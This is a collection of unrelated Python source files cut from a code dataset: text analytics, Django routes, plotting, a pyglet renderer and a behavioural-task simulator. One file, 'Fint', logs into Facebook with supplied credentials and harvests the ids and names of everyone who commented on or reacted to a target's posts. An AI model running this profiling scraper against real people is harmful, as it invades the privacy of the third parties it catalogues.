best_collocations = bigram_finder.nbest(bigram_measures.raw_freq, num_collocations)
print("=====The {:d} Most Frequent Collocations=====".format(num_collocations))
pprint.pprint(best_collocations)
if compare_collocations:
print("=====The {:d} Best Collocations (Pointwise Mutual Information)=====".format(num_collocations))
pprint.pprint(bigram_finder.nbest(bigram_measures.pmi, num_collocations))
print("=====The {:d} Best Collocations (Student's t test)=====".format(num_collocations))
pprint.pprint(bigram_finder.nbest(bigram_measures.student_t, num_collocations))
print("=====The {:d} Best Collocations (Chi-square test)=====".format(num_collocations))
pprint.pprint(bigram_finder.nbest(bigram_measures.chi_sq, num_collocations))
print("=====The {:d} Best Collocations (Mutual Information)=====".format(num_collocations))
pprint.pprint(bigram_finder.nbest(bigram_measures.mi_like, num_collocations))
print("=====The {:d} Best Collocations (Likelihood Ratios)=====".format(num_collocations))
pprint.pprint(bigram_finder.nbest(bigram_measures.likelihood_ratio, num_collocations))
print("=====The {:d} Best Collocations (Poisson Stirling)=====".format(num_collocations))
pprint.pprint(bigram_finder.nbest(bigram_measures.poisson_stirling, num_collocations))
print("=====The {:d} Best Collocations (Jaccard Index)=====".format(num_collocations))
pprint.pprint(bigram_finder.nbest(bigram_measures.jaccard, num_collocations))
print("=====The {:d} Best Collocations (Phi-square test)=====".format(num_collocations))
pprint.pprint(bigram_finder.nbest(bigram_measures.phi_sq, num_collocations))
print("=====The {:d} Best Collocations (Fisher's Exact Test)=====".format(num_collocations))
pprint.pprint(bigram_finder.nbest(bigram_measures.fisher, num_collocations))
print("=====The {:d} Best Collocations (Dice's Coefficient)=====".format(num_collocations))
pprint.pprint(bigram_finder.nbest(bigram_measures.dice, num_collocations))
return best_collocations
# End of extract_collocations()
if __name__ == "__main__":
args = parse_arguments()
records = load_records(args.file, False)
tokenized_records = tokenize_records(records)
extract_frequent_words(tokenized_records, args.num_words, True)
extract_collocations(tokenized_records, args.num_collocations, args.collocation_window, False)
|
15,679 | b3f1f255b538ee1e55f6f0e478c3986c345bb970 | def readFile(file_path):
f = open(file_path, 'r')
contents = f.read()
f.close()
return contents
def writeFile(file_path, contents):
f = open(file_path, 'w+')
f.write(contents)
f.close()
return f
if __name__ == '__main__':
file = readFile('docs/read.txt')
writeFile('docs/write.txt', file); |
15,680 | 180bbad65a2c3e278381dfa9f403db8caade9a54 | import simplejson as json
from .KalliopeiaClass import KalliopeiaClass
def preparate_kalliopeia(f_setting):
f = f_setting.open("r")
jsonData = json.load(f)
toKalliopeia = KalliopeiaClass(jsonData["kalliopeia_url"])
facilitator = jsonData["facilitator"]
f_token = toKalliopeia.get_access_token(name=facilitator["name"],password=facilitator["password"])
toKalliopeia.f_token = f_token
return toKalliopeia |
15,681 | 7a7414f20c8e206ed23563907ae8472c980628ad | import string
import random
num = random.randint(10000000000,20000000000)
print(num)
primearray = []
for i in range(1,num):
if num%i == 0:
print(i)
primearray =primearray + [i]
print(primearray)
primefac = []
print('\n')
for x in primearray:
primarr = []
for y in range(1,x+1):
if x%y == 0:
primarr = primarr + [y]
if len(primarr) == 2:
primefac = primefac + [x]
print(primefac) |
15,682 | 9e07364ac778040f4c195e3a446c90f3d8870ffe | from django.conf.urls import include, url, patterns
from django.views.generic import TemplateView
from accounts.views import service_provider, my_jobs_view, update_job, update_employer, application_questions, employer_page, update_social, social_links, update_documents, documents, update_language, language, update_skill, skills, education_form, update_education, education, update_work_experience, work_experience, update_job_criteria, job_criteria, update_user_profile, profile_userdetails, update_category, socialauth, signup, email_checkup_json, create_user, complete, confirm_verification, update_profile, user_details, deactivate_industry, activate_industry
from django.contrib.auth.views import password_change, password_change_done, password_reset, password_reset_done, password_reset_confirm, password_reset_complete
from accounts.views import JobListView
from django.views.generic import ListView
urlpatterns = [
url(r'^signup$', signup),
url(r'^service-provider$', service_provider),
url(r'^profile_home$', profile_userdetails, name="profile_details"),
url(r'^job_criteria$', job_criteria, name="job_criteria"),
url(r'^work_experience$', work_experience, name="work_experience"),
url(r'^education$', education, name="education"),
url(r'^skills$', skills, name="skills"),
url(r'^language$', language, name="language"),
url(r'^documents$', documents, name="documents"),
url(r'^social-links$', social_links, name="social_links"),
url(r'^application-questions$', application_questions, name="application_questions"),
url(r'^post-job$', update_job, name="post_job"),
url(r'^create-job$',my_jobs_view, name="create_job"),
url(r'^complete_signup$', socialauth),
url(r'^create_user$', create_user),
url(r'^complete$', complete),
url(r'^check_email$', email_checkup_json),
url(r'^update_profile$', update_profile),
url(r'^update_employer$', update_employer),
url(r'^update_employer_2$', update_job),
url(r'^update_user_profile$', update_user_profile),
url(r'^update_job_criteria$', update_job_criteria),
url(r'^update_work_experience$', update_work_experience),
url(r'^update_education$', update_education),
url(r'^update_skill$', update_skill),
url(r'^update_language$', update_language),
url(r'^update_documents$', update_documents),
url(r'^unlink_social$', update_social),
url(r'^update_category$', update_category),
url(r'^user-details$', user_details, name="user_details"),
url(r'^account_completion/(?P<user_id>\d+)/(?P<code>[-\w]+)$', confirm_verification, name="confirmation_link"),
url(r'^industry-demote/(?P<work_id>\d+)/(?P<code>[-\w]+)$', deactivate_industry, name="deactivate_industry"),
url(r'^industry-activate/(?P<work_id>\d+)/(?P<code>[-\w]+)$', activate_industry, name="activate_industry"),
url(r'^work_experience_form$', TemplateView.as_view(template_name="snippets/work_experience_form.html")),
url(r'^education_form$', education_form),
url(r'^language_form$', TemplateView.as_view(template_name="snippets/language_form.html")),
url(r'^link_form$', TemplateView.as_view(template_name="snippets/link_form.html")),
url(r'^document_form$', TemplateView.as_view(template_name="snippets/document_form.html")),
url(r'^price_form$', TemplateView.as_view(template_name="snippets/price_form.html")),
url(r'^', JobListView.as_view(), name = 'job-list'),
# change password urls
url(r'^password-change/$', password_change, name='password_change'),
url(r'^password-change/done/$', password_change_done, name='password_change_done'),
# restore password urls
url(r'^password-reset/$', password_reset, name='password_reset'),
url(r'^password-reset/done/$', password_reset_done, name='password_reset_done'),
url(r'^password-reset/confirm/(?P<uidb64>[-\w]+)/(?P<token>[-\w]+)/$', password_reset_confirm, name='password_reset_confirm'),
url(r'^password-reset/complete/$', password_reset_complete, name='password_reset_complete'),
] |
15,683 | 785aa9458b4dc7bfd6000b43568ce70beff88dd4 | def prime_checker(number):
isPrime = True
for n in range(2, number):
if number % n == 0:
isPrime = False
if isPrime:
print("It's a prime number.")
else:
print("It's not a prime number.")
n = int(input("Check this number: "))
prime_checker(number=n) |
15,684 | 536d3d4fcb74484647889d6139ba5af49b5f3ea4 | from functools import cached_property
from typing import ClassVar, List, Protocol
import pyglet
from pyglet import shapes
from codanim.drawable import add_to_batch
from codanim.element import Element
# mixing concerns between scene and scene renderer for now, but temporary
class Renderer(Protocol):
def draw(self, elements: List[Element]) -> None:
...
class PygletSceneRenderer(Renderer):
def __init__(self, configs):
self.elements = None
# for eg pyglet.window.FPSDisplay(window=scene.renderer.window)
# could be kwarg for fps?
self.extra_drawables = []
self.window = self.create_window()
self.window.on_draw = self.on_draw
if (enable_fps := getattr(configs, "enable_fps", None)) is not None:
if enable_fps: # not usefulf for a bool, but useful for others l8r
fps_display = pyglet.window.FPSDisplay(window=self.window)
self.extra_drawables.append(fps_display)
def create_window(self):
return pyglet.window.Window(960, 540)
# @cached_property
# def window(self) -> pyglet.window.Window:
# self._window = pyglet.window.Window(960, 540)
# self._window.on_draw = self.on_draw
# return self._window
def draw(self, elements: List[Element]) -> None:
self.elements = elements
self.window.switch_to()
# self.on_draw()
def on_draw(self) -> None:
self.window.clear()
if not self.elements:
print("No elements to draw.")
return
batch = pyglet.graphics.Batch()
# have to keep references to batched objs
# or pyglet will lose them by the time batch.draw()
# is called
refs = []
for element in self.elements:
refs.extend(element.add_to_batch(batch))
batch.draw()
for drawable in self.extra_drawables:
drawable.draw()
class SceneBase:
renderer_cls: ClassVar[type] = PygletSceneRenderer
def construct(self):
raise NotImplementedError
@cached_property
def renderer(self):
return self.renderer_cls(self.Configs)
class Configs:
pass
class StaticScene(SceneBase):
def construct(self) -> List[Element]:
raise NotImplementedError
def draw(self, dt):
elements = self.construct()
self.renderer.draw(elements)
|
15,685 | 6ab7a40e87d83dff8ed7228ba48812cc1b182380 | from datos.registros import RegistroData
class RegistroLogic():
@staticmethod
def insert_one(registro):
RegistroData.create_registro(registro)
@staticmethod
def get_by_id(registro_id):
return RegistroData.get_by_id(registro_id)
@staticmethod
def update_registro(registro_id, registro):
RegistroData.update_registro(registro_id, registro)
@staticmethod
def find_by_categoria(categoria):
return RegistroData.find_by_categoria(categoria)
@staticmethod
def get_lasts_registers(userid, top):
l = list(RegistroData.get_lasts_registers(userid, top))
return l
@staticmethod
def get_balance(userid):
montos = list(RegistroData.get_montos(userid))
count = 0
for m in montos:
if m["tipo"] == "gasto":
count = count - float(format(m["valor"], ".2f"))
elif m["tipo"] == "ingreso":
count = count + float(format(m["valor"], ".2f"))
return count
@staticmethod
def get_sueldo(userid):
try:
sueldo = RegistroData.get_sueldo(userid)
if sueldo is not None:
return sueldo["valor"]
else:
return "No hay sueldos cargados"
except ValueError as e:
print("Error en la conversión de tipo de dato: {0}", format(e))
@staticmethod
def get_tipos(userid):
cur = RegistroData.get_registros(userid)
cat = {}
for i in cur:
a = i['tipo']
if i['tipo'] in list(cat):
cat[a] = cat[a] + i['valor']
else:
cat[a] = i['valor']
print(cat)
return cat
@staticmethod
def get_cats(userid, tipo):
registros = RegistroData.get_categorias(userid, tipo)
c = {}
for r in registros:
for categoria in r["categoria"]:
if categoria in c:
c[categoria] += r["valor"]
else:
c[categoria] = r["valor"]
return c
@staticmethod
def get_cats_names(userid, tipo):
registros = RegistroData.get_categorias(userid, tipo)
cat_nombres = []
for r in registros:
for categoria in r["categoria"]:
if categoria not in cat_nombres:
cat_nombres.append(categoria)
return cat_nombres
|
15,686 | 4c6befbf09bb465c760cf41b9037e6c50de292a6 | import re, os, csv, sys, time
import json, random, argparse
from collections import Counter
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.firefox.options import Options
from selenium.common.exceptions import TimeoutException, NoSuchElementException
VERSION = "0.2"
BANNER = """
{0} v. {1} - Fint: Find users who interacted with a profile
by sowdust
""".format(sys.argv[0], VERSION)
BASE_URL = 'https://mbasic.facebook.com'
def log(m):
return
def pause(min=2, max=5):
return round(random.uniform(min, max), 1)
def do_login(driver, usr, pwd):
log('[*] Trying to log in with user %s' % usr)
driver.get('https://www.facebook.com')
try:
elem = driver.find_element_by_xpath('//button[@data-cookiebanner="accept_button"]')
elem.click()
except Exception as ex:
print('[!] Error while accepting cookies:')
print(ex)
try:
elem = driver.find_element_by_id('email')
elem.send_keys(usr)
elem = driver.find_element_by_id('pass')
elem.send_keys(pwd)
except NoSuchElementException:
elem = driver.find_element_by_name('email')
elem.send_keys(usr)
elem = driver.find_element_by_name('pass')
elem.send_keys(pwd)
except Exception as ex:
print('[!] Error while logging in:')
print(ex)
sys.exit(0)
elem.send_keys(Keys.RETURN)
time.sleep(pause(2, 3))
def check_login(driver):
time.sleep(pause(3, 4))
if 'href="/me/"' not in driver.page_source:
print('[!] Not logged in. Did you use valid credentials?')
print(driver.page_source)
sys.exit(0)
else:
log('[*] Logged in')
def get_stories_urls(html, target):
# only return stories BY the user
user_token = 'id=%s' % target
links = re.findall('(/story.php\?story_fbid=[^"#]+)', html)
return [
'%s%s' % (BASE_URL, x.replace('&', '&')) for x in set(links)
if user_token in x
]
def get_photos_urls(target_id, html):
links = re.findall('(/photo\.php\?[^;]*;id=%s[^"]+)' % target_id, html)
return ['%s%s' % (BASE_URL, x.replace('&', '&')) for x in set(links)]
def get_all_photos(driver, target_id, limit=100):
url = 'https://mbasic.facebook.com/profile.php?id=%s&v=photos' % target_id
driver.get(url)
time.sleep(pause())
see_all = re.findall('<a href="([^"#]+)">See All</a>', driver.page_source)
photos = []
if not see_all:
return photos
else:
driver.get(BASE_URL + see_all[0].replace('&', '&'))
while len(photos) < limit:
photos += get_photos_urls(target_id, driver.page_source)
see_more = re.findall(
'<a href="(.[^"#]*)"><span>See More Photos</span></a>',
driver.page_source)
if not see_more:
see_more = re.findall('<a href="(.[^"#]*)">Show more</a>',
driver.page_source)
if see_more:
url = BASE_URL + see_more[0].replace('&', '&')
time.sleep(pause())
driver.get(url)
else:
break
return photos
def get_all_stories(driver, target, limit=100):
url = 'https://mbasic.facebook.com/%s?v=timeline' % target
driver.get(url)
stories = []
while len(stories) < limit:
stories += get_stories_urls(driver.page_source, target)
see_more = re.findall(
'<a href="(.[^"#]*)"><span>See More Stories</span></a>',
driver.page_source)
if not see_more:
see_more = re.findall('<a href="(.[^"#]*)">Show more</a>',
driver.page_source)
if see_more:
url = BASE_URL + see_more[0].replace('&', '&')
time.sleep(pause())
driver.get(url)
else:
break
return stories
def get_all_comments(driver, url, limit=200, cur_length=0):
if cur_length >= limit:
return []
driver.get(url)
html = driver.page_source.encode("utf-8",
errors='replace').decode("utf-8",
errors="replace")
commenters = parse_commenters(html)
cur_length += len(commenters)
more_comments_url = re.findall(
'<div class=".[^"]*" id="see_next_[0-9]+"><a href="(.[^"]*)">', html)
more_comments_url = [
'%s%s' % (BASE_URL, x.replace('&', '&')) for x in more_comments_url
]
if (more_comments_url) and limit > cur_length:
time.sleep(pause())
url = more_comments_url[0]
commenters += get_all_comments(driver,
url,
limit,
cur_length=cur_length)
return commenters
# given a driver on a story.php page, extracts all users who have reacted
# takes only 1st level reactions (not consideringr reactions to comments etc.)
def get_all_reactions(driver,
url,
reactions_per_page=999,
limit=2000,
cur_length=0):
if cur_length >= limit:
return []
driver.get(url)
html = driver.page_source.encode("utf-8",
errors='replace').decode("utf-8",
errors="replace")
reactions = parse_likers(html)
cur_length += len(reactions)
reaction_urls = re.findall(
'(/ufi/reaction/profile/browser/(?!.*(?:reaction_type|total_count=0)).[^"]*)',
html)
reaction_urls = [
'%s%s' % (BASE_URL, x.replace('&', '&').replace(
'?limit=10', '?limit=%d' % reactions_per_page))
for x in reaction_urls
]
if (reaction_urls) and limit > cur_length:
time.sleep(pause())
url = reaction_urls[0]
reactions += get_all_reactions(driver, url, reactions_per_page, limit,
cur_length)
return reactions
# Given a story.php page, return a list of (url, display name)
def parse_commenters(html):
return re.findall(
'<h3><a class="[^"]+" href="([^"]+)\?r[^"]*">([^<]*)</a>', html)
# Given a "reactions" page ufi/reaction/profile/browser/, returns a list of (url, display name)
def parse_likers(html):
return re.findall(
'<h3 class=".[^"]*"><a href="(.[^"]*)[^"]*">(.[^<]*)</a></h3>', html)
def profile_picture(driver, target_username):
url = '%sphoto.php?fbid=%s' % (BASE_URL, target_username)
driver.get(url)
commenters = parse_commenters(driver.page_source)
# given a list of [username, name] returns a list of [id, name, username]
def fill_user_ids(driver, users):
res = []
c = 0
msg = '[*] Retreiving user ids... '
try:
for u in users:
c += 1
msg = '%s[*] Retreiving user ids... %d of %d' % ('\r' * len(msg),
c, len(users))
print(msg, end='\r')
time.sleep(pause())
fbid = get_user_id(driver, u[0])
user = (fbid, u[1], u[0])
res.append(user)
except (KeyboardInterrupt, SystemExit):
print('[!] KeyboardInterrupt received. Exiting...')
return res
except Exception as ex:
print('[!] Error while retrieving user ids')
print(ex)
return res
return res
# given a username, finds the fb user id from the source of the profile page
def get_user_id(driver, username):
url = 'https://www.facebook.com/%s' % username.replace('/', '')
driver.get(url)
fbid = re.findall('"scale":1,"userID":"([0-9]+)"}', driver.page_source)
if fbid:
return fbid[0]
else:
print('[!] Error while getting id of user %s' % username)
return -1
def get_username(driver, userid):
url = 'https://www.facebook.com/%s' % userid
driver.get(url)
time.sleep(pause())
return driver.current_url.split('/')[-1].split('?')[0]
def parse_args():
parser = argparse.ArgumentParser(
description='Find users who interacted with a Facebook profile.')
parser.add_argument(
'-fu',
'--user',
metavar='USERNAME',
type=str,
help='Username of the Facebook account that will be used for scraping')
parser.add_argument(
'-fp',
'--password',
metavar='PASSWORD',
type=str,
help='Username of the Facebook account that will be used for scraping')
parser.add_argument(
'-t',
'--target',
metavar='TARGET',
type=str,
help='Username or numeric id of the target Facebook account')
parser.add_argument('-ls',
'--limit-stories',
metavar='LIMIT',
type=int,
default=20,
help='Max number of stories to analyze')
parser.add_argument('-lp',
'--limit-photos',
metavar='LIMIT',
type=int,
default=20,
help='Max number of photos to analyze')
parser.add_argument(
'-lr',
'--limit-reactions',
metavar='LIMIT',
default=1000,
type=int,
help='Max number of reactions to analyze for each story')
parser.add_argument(
'-lc',
'--limit-comments',
metavar='LIMIT',
default=100,
type=int,
help='Max number of comments to analyze for each story')
parser.add_argument('-o',
'--output',
metavar='OUTPUTFILE',
type=str,
help='Specify the name of the pivots output file')
parser.add_argument('-csv',
'--csv-output',
metavar='CSVOUTPUTFILE',
type=str,
help='Store output file also in CSV format')
parser.add_argument(
'-q',
'--headless',
action='store_true',
help='Run browser in headless mode. No browser window will be shown.')
parser.add_argument('-d',
'--driver-path',
metavar='EXECUTABLE',
type=str,
help='Path to geckodriver executable')
args = parser.parse_args(args=None if len(sys.argv) > 1 else ['--help'])
return args
def print_statistics(commenters, reactions):
print('-' * 78)
print(' ' * 34, end=' ')
print('STATISTICS')
print('-' * 78)
print('Most comments:')
for u in Counter(commenters).most_common():
print('[%d]\t%s (%s)' % (u[1], u[0][1], u[0][0]))
print()
print('Most reactions:')
for u in Counter(reactions).most_common():
print('[%d]\t%s (%s)' % (u[1], u[0][1], u[0][0]))
print()
print('Total:')
for u in Counter(commenters + reactions).most_common():
print('[%d]\t%s (%s)' % (u[1], u[0][1], u[0][0]))
print()
def store_csv(users, csv_file_path):
print('[*] Storing users in csv file %s' % csv_file_path)
with open(csv_file_path, mode='w', newline='',
encoding='utf-8') as csv_file:
writer = csv.writer(csv_file,
delimiter=',',
quotechar='"',
quoting=csv.QUOTE_MINIMAL)
writer.writerow(['id', 'name', 'url'])
for u in users:
writer.writerow(u)
def store_pivots(users, path):
print('[*] Storing users id in file %s' % path)
with open(path, 'w') as f:
for u in users:
f.write('%s\n' % u[0])
def check_file_exists(file):
yes = {'yes', 'y', 'ye'}
if os.path.isfile(file):
print(
'[!] Warning: output file %s already exists. Do you want to overwrite? [y/N]'
% file,
end=' ')
choice = input().lower()
if choice not in yes:
sys.exit(0)
def main():
print(BANNER)
args = parse_args()
options = Options()
if args.headless: options.add_argument("--headless")
driver = webdriver.Firefox(executable_path=args.driver_path,
options=options)
do_login(driver, args.user, args.password)
check_login(driver)
if args.target.isdigit():
target_id = args.target
target_username = get_username(driver, target_id)
else:
target_id = get_user_id(driver, args.target)
target_username = args.target
print('[*] Selected target: %s (%s)' % (target_username, target_id))
urls_to_visit = []
commenters = []
reactions = []
users = []
print('[*] Getting photos links... ', end=" ")
photos = get_all_photos(driver, target_id,
args.limit_photos)[:args.limit_photos]
print('%d photos found' % len(photos))
print('[*] Getting stories links... ', end=" ")
stories = get_all_stories(driver, target_id,
args.limit_stories)[:args.limit_stories]
print('%d stories found' % len(stories))
print(
'[*] Retreiving users who have interacted... press Ctrl+C when you have enough'
)
msg = ''
try:
for url in photos + stories:
commenters += parse_commenters(driver.page_source)
if len(commenters) < args.limit_comments:
commenters += get_all_comments(driver,
url,
limit=args.limit_comments)
if len(reactions) < args.limit_reactions:
reactions += get_all_reactions(driver,
url,
limit=args.limit_reactions)
users = list(set(reactions).union(set(commenters)))
msg = '%sUnique users: %d Comments: %d Reactions: %d' % (
'\r' * len(msg), len(users), len(commenters), len(reactions))
print(msg, end='\r')
except (KeyboardInterrupt, SystemExit):
print('[!] KeyboardInterrupt received. %d users retrieved' %
len(users))
reactions = reactions[:args.limit_reactions]
commenters = commenters[:args.limit_comments]
users = list(set(reactions).union(set(commenters)))
print_statistics(commenters, reactions)
users = fill_user_ids(driver, users)
if args.output:
store_pivots(users, args.output)
else:
store_pivots(users, '%s-pivots.txt' % target_id)
if args.csv_output:
store_csv(users, args.csv_output)
print('[*] Found %d comments and %d reactions from %d unique users ' %
(len(commenters), len(reactions), len(users)))
driver.close()
if __name__ == '__main__':
main() |
15,687 | 06ed9c4a0bdee76ef648fe7e5a70a61abae6d89c | # -*- coding: utf-8 -*-
"""
Visualization functions
"""
import matplotlib.pyplot as plt
import numpy as np
# Visualize the training course
from utilities.losses import compute_loss
def compute_z_loss(y, x, thetas):
"""
Compute z-axis values
:param y: train labels
:param x: train data
:param thetas: model parameters
:return: z_losses value (loss) for z-axis
"""
thetas = np.array(thetas)
w = thetas[:, 0].reshape(thetas[:, 0].shape[0], )
b = thetas[:, 1].reshape(thetas[:, 1].shape[0], )
z_losses = np.zeros((len(w), len(b)))
for ind_row, row in enumerate(w):
for ind_col, col in enumerate(b):
theta = np.array([row, col])
z_losses[ind_row, ind_col] = compute_loss(y, x, theta, "MSE")
return z_losses
def predict(x, thetas):
"""
Predict function
:param x: test data
:param thetas: trained model parameters
:return: prediced labels
"""
return x.dot(thetas)
def visualize_train(train_data_full, train_labels, train_data, thetas, losses, niter):
"""
Visualize Function for Training Results
:param train_data_full: the train data set (full) with labels and data
:param thetas: model parameters
:param losses: all tracked losses
:param niter: completed training iterations
:return: fig1 the figure for line fitting on training data
fig2 learning curve in terms of error
fig3 gradient variation visualization
"""
fig1, ax1 = plt.subplots()
ax1.scatter(train_data_full["Weight"], train_data_full["Height"], color = 'blue')
# De-standarize
train_mean = train_data_full["Weight"].mean()
train_std = train_data_full["Weight"].std()
train_data_for_plot = train_mean + train_data["Weight"] * train_std
ax1.plot(train_data_for_plot, predict(train_data, thetas[niter - 1]), color = 'red', linewidth = 2)
ax1.set_xlabel("Height")
ax1.set_ylabel("Weight")
fig2, ax2 = plt.subplots()
ax2.plot(range(len(losses)), losses, color = 'blue', linewidth = 2)
ax2.set_xlabel("Iteration")
ax2.set_ylabel("MSE")
fig3, ax3 = plt.subplots()
np_gradient_ws = np.array(thetas)
w = np.linspace(min(np_gradient_ws[:, 0]), max(np_gradient_ws[:, 0]), len(np_gradient_ws[:, 0]))
b = np.linspace(min(np_gradient_ws[:, 1]), max(np_gradient_ws[:, 1]), len(np_gradient_ws[:, 1]))
x, y = np.meshgrid(w, b)
z = compute_z_loss(train_labels, train_data, np.stack((w,b)).T)
cp = ax3.contourf(x, y, z, cmap = plt.cm.jet)
fig3.colorbar(cp, ax = ax3)
ax3.plot(3.54794951, 66.63949115837143, color = 'red', marker = '*', markersize = 20)
if niter > 0:
thetas_to_plot = np_gradient_ws[:niter]
ax3.plot(thetas_to_plot[:, 0], thetas_to_plot[:, 1], marker = 'o', color = 'w', markersize = 10)
ax3.set_xlabel(r'$w$')
ax3.set_ylabel(r'$b$')
return fig1, fig2, fig3
def visualize_test(test_data_full, test_data, thetas):
"""
Visualize Test for Testing Results
:param test_data_full: the test data set (full) with labels and data
:param thetas: model parameters
:return: fig
"""
fig, ax = plt.subplots()
ax.scatter(test_data_full["Weight"], test_data_full["Height"], color='blue')
ax.plot(test_data_full["Weight"], predict(test_data, thetas[-1]), color='red', linewidth=2)
return fig
|
15,688 | 6b8f1c5d4debe159ceb3f85514577fd4dec9df2b | import simplejson as json
import urllib
api_key = open(".freebase_api_key").read()
service_url = 'https://www.googleapis.com/freebase/v1/mqlread'
query = [{"name": {}, "a:type":"/music/artist", "b:type": "/common/topic", "limit": 100}]
params = {'query': json.dumps(query), 'key': api_key}
url = service_url + '?' + urllib.urlencode(params)
print url
response = json.loads(urllib.urlopen(url).read())
try:
for artist in response['result']:
print repr(artist['name']['value']) #print planet['name']['value']
except:
print response
|
15,689 | 43d707adff7ee6342ed39b9adfb7ca8d1424604b | import json
def count_ys(filename):
f = open(filename, 'r')
dic = {}
counter = 0
for line in f:
if "as mysterious as" in line:
temp = line.split()
if dic.has_key(temp[4]):
dic[temp[4]] = dic[temp[4]]+int(temp[6])
else:
dic[temp[4]] = int(temp[6])
counter = counter+1
return dic
ddic = count_ys("as_x.txt")
ddic_sorted = sorted(ddic, key=ddic.get, reverse=True)
print json.dumps(ddic, indent=4)
print json.dumps(ddic_sorted, indent=4)
|
15,690 | 6fe1f8e6a9f3511b5ec1c358a4bfa8eef6a0b571 | #!/usr/bin/env python3
import matplotlib.pyplot as plt
from matplotlib.cm import get_cmap
import matplotlib
import statistics
from ast import literal_eval as make_tuple
from scipy import interpolate
import numpy as np
import sys
# AOMS
plt.plot([], [], ' ', label='Aq modes comparison')
with open(sys.argv[1], 'r') as f:
data = make_tuple(f.read())
dt = []
x_limit = []
y_limit = []
for q in sorted(set([x[2] for x in data])):
dt = [x for x in data if x[2] == q]
x = sorted([x[4] for x in dt])
y = sorted([x[5] for x in dt])
x_limit.append((min(x), max(x)))
y_limit.append((min(y), max(y)))
time = sum([x[1] for x in dt])/len(dt)
f = interpolate.interp1d(x, y, kind='quadratic')
xnew = np.linspace(min(x), max(x), max(x) - min(x) )
plt.plot(xnew, f(xnew), label=f'--aq-mode={q}', linewidth=3)
# Plot
xlim = min([x[0] for x in x_limit])
x_max = max(([x[1] for x in x_limit]))
ylim = min([x[0] for x in y_limit])
y_max = max(([x[1] for x in y_limit]))
plt.tight_layout()
plt.xticks([x for x in range(0, x_max, 1000)])
plt.yticks([x for x in range(30, 100, 1)])
[plt.axvline(i, color='grey', linewidth=0.3) for i in range(0, x_max, 500)]
[plt.axhline(i, color='grey', linewidth=0.5) for i in range(21, 100, 2)]
[plt.axhline(i, color='black', linewidth=1) for i in range(22, 100, 2)]
plt.ylabel('Vmaf', size=20)
plt.xlabel('Bitrate', size=20)
plt.title('AOM --aq-mode=0 vs --aq-mode=1 31.07.2020 ', size=30)
plt.legend(prop={'size': 20}, loc="lower right")
plt.xlim(xlim, x_max)
plt.ylim((ylim, 100))
plt.show()
|
15,691 | 29a1689718e09d035a75ffbc8dc070828d6a2815 | import numpy as np
from random import randint, random
# -------------------------------------------------------------------------------------
# Extended two step
# -------------------------------------------------------------------------------------
def with_prob(prob):
'return true / flase with specified probability .'
return random() < prob
class Extended_two_step:
'''Two step task with reversals in both which side is good and the transition matrix.'''
def __init__(self, neutral_reward_probs = False):
# Parameters
self.norm_prob = 0.8 # Probability of normal transition.
self.neutral_reward_probs = neutral_reward_probs
if neutral_reward_probs:
self.reward_probs = np.array([[0.4, 0.4], # Reward probabilities in each reward block type.
[0.4, 0.4],
[0.4, 0.4]])
else:
self.reward_probs = np.array([[0.8, 0.2], # Reward probabilities in each reward block type.
[0.4, 0.4],
[0.2, 0.8]])
self.threshold = 0.75
self.tau = 8. # Time constant of moving average.
self.min_block_length = 40 # Minimum block length.
self.min_trials_post_criterion = 20 # Number of trials after transition criterion reached before transtion occurs.
self.mov_ave = exp_mov_ave(tau = self.tau, init_value = 0.5) # Moving average of agents choices.
self.reset()
def reset(self, n_trials = 1000):
self.transition_block = with_prob(0.5) # True for A blocks, false for B blocks.
self.reward_block = randint(0,2) # 0 for left good, 1 for neutral, 2 for right good.
self.block_trials = 0 # Number of trials into current block.
self.cur_trial = 0 # Current trial number.
self.trans_crit_reached = False # True if transition criterion reached in current block.
self.trials_post_criterion = 0 # Current number of trials past criterion.
self.trial_number = 1 # Current trial number.
self.n_trials = n_trials # Session length.
self.mov_ave.reset()
self.end_session = False
self.blocks = {'start_trials' : [0],
'end_trials' : [],
'reward_states' : [self.reward_block], # 0 for left good, 1 for neutral, 2 for right good.
'transition_states' : [self.transition_block]} # 1 for A blocks, 0 for B blocks.
def trial(self, choice):
# Update moving average.
self.mov_ave.update(choice)
second_step = (choice == with_prob(self.norm_prob)) == self.transition_block
self.block_trials += 1
self.cur_trial += 1
outcome = int(with_prob(self.reward_probs[self.reward_block, second_step]))
# Check for block transition.
block_transition = False
if self.trans_crit_reached:
self.trials_post_criterion +=1
if (self.trials_post_criterion >= self.min_trials_post_criterion) & \
(self.block_trials >= self.min_block_length):
block_transition = True
else: # Check if transition criterion reached.
if self.reward_block == 1 or self.neutral_reward_probs: #Neutral block
if (self.block_trials > 20) & with_prob(0.04):
self.trans_crit_reached = True
elif self.transition_block ^ (self.reward_block == 0): # High is good option
if self.mov_ave.ave > self.threshold:
self.trans_crit_reached = True
else: # Low is good option
if self.mov_ave.ave < (1. -self.threshold):
self.trans_crit_reached = True
if block_transition:
self.block_trials = 0
self.trials_post_criterion = 0
self.trans_crit_reached = False
old_rew_block = self.reward_block
if old_rew_block == 1: # End of neutral block always transitions to one side
self.reward_block = with_prob(0.5) * 2 # being good without reversal of transition probabilities.
else: # End of block with one side good, 50% chance of change in transition probs.
if with_prob(0.5): #Reversal in transition probabilities.
self.transition_block = not self.transition_block
if with_prob(0.5): # 50% chance of transition to neutral block.
self.reward_block = 1
else: # No reversal in transition probabilities.
if with_prob(0.5):
self.reward_block = 1 # Transition to neutral block.
else:
self.reward_block = 2 - old_rew_block # Invert reward probs.
self.blocks['start_trials'].append(self.cur_trial)
self.blocks['end_trials'].append(self.cur_trial)
self.blocks['reward_states'].append(self.reward_block)
self.blocks['transition_states'].append(self.transition_block)
if self.cur_trial >= self.n_trials: #End of session.
self.end_session = True
self.blocks['end_trials'].append(self.cur_trial + 1)
self.blocks['trial_trans_state'] = np.zeros(self.n_trials, dtype = bool) #Boolean array indication state of tranistion matrix for each trial.
self.blocks['trial_rew_state'] = np.zeros(self.n_trials, dtype = int)
for start_trial,end_trial, trans_state, reward_state in \
zip(self.blocks['start_trials'],self.blocks['end_trials'], \
self.blocks['transition_states'], self.blocks['reward_states']):
self.blocks['trial_trans_state'][start_trial - 1:end_trial-1] = trans_state
self.blocks['trial_rew_state'][start_trial - 1:end_trial-1] = reward_state
return (second_step, outcome)
class exp_mov_ave:
'Exponential moving average class.'
def __init__(self, tau, init_value):
self.tau = tau
self.init_value = init_value
self.reset()
def reset(self, init_value = None, tau = None):
if tau:
self.tau = tau
if init_value:
self.init_value = init_value
self.ave = self.init_value
self._m = np.exp(-1./self.tau)
self._i = 1 - self._m
def update(self, sample):
